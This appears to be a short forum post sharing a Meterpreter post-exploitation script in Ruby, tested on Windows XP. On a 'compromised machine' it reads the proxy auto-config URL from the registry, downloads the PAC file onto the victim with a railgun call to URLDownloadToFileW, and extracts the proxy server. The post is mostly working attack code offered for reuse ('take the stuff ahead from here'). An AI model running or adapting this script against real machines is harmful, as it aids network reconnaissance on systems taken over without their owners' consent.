The following meterpreter script is an example of reading proxy auto config file (pac) to check for the proxy servers being used by compromised machine.
Tested on Windows XP only.
#This is just a concept of reading pac file from the compromised machine. #You can take the stuff ahead from here :-) #oldmanlab@gmail.com #Variable initialization session = client if session.platform =~ /win32|win64/ #Read the key and the get the AutoConfig URL open_key = session.sys.registry.open_key(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion \Internet Settings', KEY_READ) begin url = open_key.query_value('AutoConfigURL').data print_status('Reading pac file.....') #Download the pac file session.railgun.add_dll('urlmon','urlmon') session.railgun.add_function('urlmon', 'URLDownloadToFileW', 'DWORD', [['PBLOB', 'pCaller', 'in'], ['PWCHAR','szURL','in'],['PWCHAR','szFileName','in'],['DWORD','dwReserved','in'],['PBLOB','lpfnCB','inout']]) session.railgun.urlmon.URLDownloadToFileW(nil,url,'proxy.pac',0,nil) #Read the file and search for the proxy servers proxy_data = '' temp = session.fs.file.new('proxy.pac','rb') until temp.eof? proxy_data << temp.read end proxy_host = proxy_data.match(/PROXY(.*)";/)[1] print_status('The proxy server is:'+proxy_host) rescue print_status('No pac file found') end else print_status('Victim is not using Windows') end
I never did code in ruby before so any suggestions are welcome.
